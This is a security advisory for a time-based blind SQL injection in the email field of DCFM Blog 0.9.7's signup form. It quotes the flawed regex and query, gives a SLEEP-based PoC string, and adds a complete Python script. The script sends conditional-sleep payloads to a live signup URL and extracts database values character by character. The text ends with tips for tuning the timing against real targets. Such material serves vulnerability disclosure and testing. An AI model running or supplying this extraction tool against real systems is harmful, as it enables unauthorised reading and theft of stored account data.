DCFM Blog Version 0.9.7 Blind SQL Injection Vulnerability (time-based attack)
=============================================================================
Discovered by N_A , N_A[at]tutanota.com
========================================
Description
============
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.
https://sourceforge.net/projects/dcfm-blog/
Vulnerability
==============
A blind SQL Injection is possible within the signup.php file of DCFM Blog version 0.9.7.
$desuser = $_POST['desuser'];
$despass = $_POST['despass'];
$email = $_POST['email']; <---- The vulnerable variable
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$submitted = $_POST['submitted'];
$despassconfirm = $_POST['despassconfirm'];
The $email variable is not properly validated. The regex only requires that the value contain an '@' followed somewhere by a '.', so it accepts any additional characters, including quotes, spaces and SQL keywords, appended to an otherwise valid address:
if(!ereg("^.+@.+\\..+$",$email)) {
$evil = 1;
$error="<p>
The highlighted fields are not filled out correctly.
</p>";
The '.+' parts of the regular expression match "one or more of any character", so a crafted SQL injection string attached to the end of a well-formed address still satisfies the check. ereg() is only a format test; it neither escapes nor rejects SQL metacharacters (and the function itself was deprecated in PHP 5.3 and removed in PHP 7.0).
The value is then interpolated, unescaped, directly into the MySQL query string. A bound parameter in a prepared statement (mysqli or PDO) would prevent this; a form-level regex cannot substitute for it:
$result = mysql_query("SELECT * FROM accounts
WHERE Email='$_POST[email]'");
while($row = mysql_fetch_array($result)) {
if ($email == $row['Email'])
Proof Of Concept Exploit String
================================
Fill out the whole form and submit the following value in the email field. If the application is vulnerable, the response is delayed by about five seconds because SLEEP(5) is evaluated for the injected WHERE clause. The subquery wrapper around SLEEP() is a conventional form, MXKf and dBWQ are arbitrary identifiers, and the trailing 'dBWQ'='dBWQ closes the quote that the original query opened:
jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ
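The following Python script is an added example, not code from the advisory or the DCFM Blog project. It ties the two points above together: it mirrors the signup.php regex to show that the injected string passes validation, reproduces the string interpolation that builds the query, and turns the single SLEEP() probe into a time-based boolean oracle that recovers a value one character at a time. The HTTP oracle assumes the form field names listed above and a target URL supplied by the caller; the simulated oracle is a constructed stand-in that answers probes as MySQL would for a column holding a known string, so the script runs offline.

```python
import re
import time
import urllib.parse
import urllib.request
from typing import Callable

# The ereg() pattern from signup.php, transcribed to Python re syntax.
# Assumption: POSIX ERE and Python re agree for this pattern (they differ
# only in how '.' treats newlines, which the payloads here never contain).
WEAK_EMAIL_RE = re.compile(r"^.+@.+\..+$")


def passes_weak_check(email: str) -> bool:
    """Mirror the signup.php check: True means the form accepts the value."""
    return WEAK_EMAIL_RE.match(email) is not None


def build_query(email: str) -> str:
    """Reproduce the interpolation signup.php performs (rewritten here, not
    the project's code): the value lands between single quotes unescaped."""
    return f"SELECT * FROM accounts WHERE Email='{email}'"


def time_payload(condition: str, delay: int = 5) -> str:
    """Wrap a boolean SQL condition so MySQL sleeps only when it is true.
    The prefix satisfies the regex (text@text.text) and the trailing
    'a'='a closes the quote that the original query opens."""
    return f"jimmy@site.com' AND IF(({condition}),SLEEP({delay}),0) AND 'a'='a"


def http_oracle(url: str, delay: int = 5, threshold: float = 4.0) -> Callable[[str], bool]:
    """Return an oracle that POSTs the signup form with a conditional sleep
    and reports whether the response took at least `threshold` seconds.
    Assumption: the other fields only need to be non-empty to reach the query."""
    def slow(condition: str) -> bool:
        form = {
            "desuser": "probe", "despass": "Probe123!", "despassconfirm": "Probe123!",
            "firstname": "a", "lastname": "b", "submitted": "1",
            "email": time_payload(condition, delay),
        }
        data = urllib.parse.urlencode(form).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, data=data, timeout=delay + 10).read()
        except OSError:
            pass  # a timeout or reset still counts by elapsed time below
        return time.monotonic() - start >= threshold
    return slow


def extract(slow: Callable[[str], bool], expr: str, max_len: int = 32) -> str:
    """Recover the result of a scalar SQL expression one character at a time
    with a binary search over ASCII codes: one probe to detect the end of the
    string, then at most seven per character."""
    out = ""
    for pos in range(1, max_len + 1):
        # SUBSTRING past the end of the string is '', and ASCII('') is 0.
        if not slow(f"ASCII(SUBSTRING(({expr}),{pos},1))>0"):
            break
        lo, hi = 0, 127  # invariant: the code of this character is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if slow(f"ASCII(SUBSTRING(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


_PROBE = re.compile(r"ASCII\(SUBSTRING\(\(.*\),(\d+),1\)\)>(\d+)$")


def simulated_oracle(secret: str) -> Callable[[str], bool]:
    """Offline stand-in for the target (constructed for this demo): answers
    the probes extract() emits as MySQL would for a column holding `secret`."""
    def slow(condition: str) -> bool:
        m = _PROBE.match(condition)
        if not m:
            raise ValueError(f"unexpected probe: {condition}")
        pos, bound = int(m.group(1)), int(m.group(2))
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > bound
    return slow


if __name__ == "__main__":
    poc = "jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ"
    print("PoC passes the regex:", passes_weak_check(poc))
    print("Resulting query:", build_query(poc))
    # Against a live target you would use http_oracle("http://host/signup.php").
    print("Recovered:", extract(simulated_oracle("admin"), "SELECT Email FROM accounts LIMIT 1"))
```

Against a real target, measure the baseline response time first and set `threshold` a little below `delay` but well above that baseline; repeating any probe whose timing is ambiguous is cheaper than extracting a wrong character.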
Email
=====
N_A[at]tutanota.com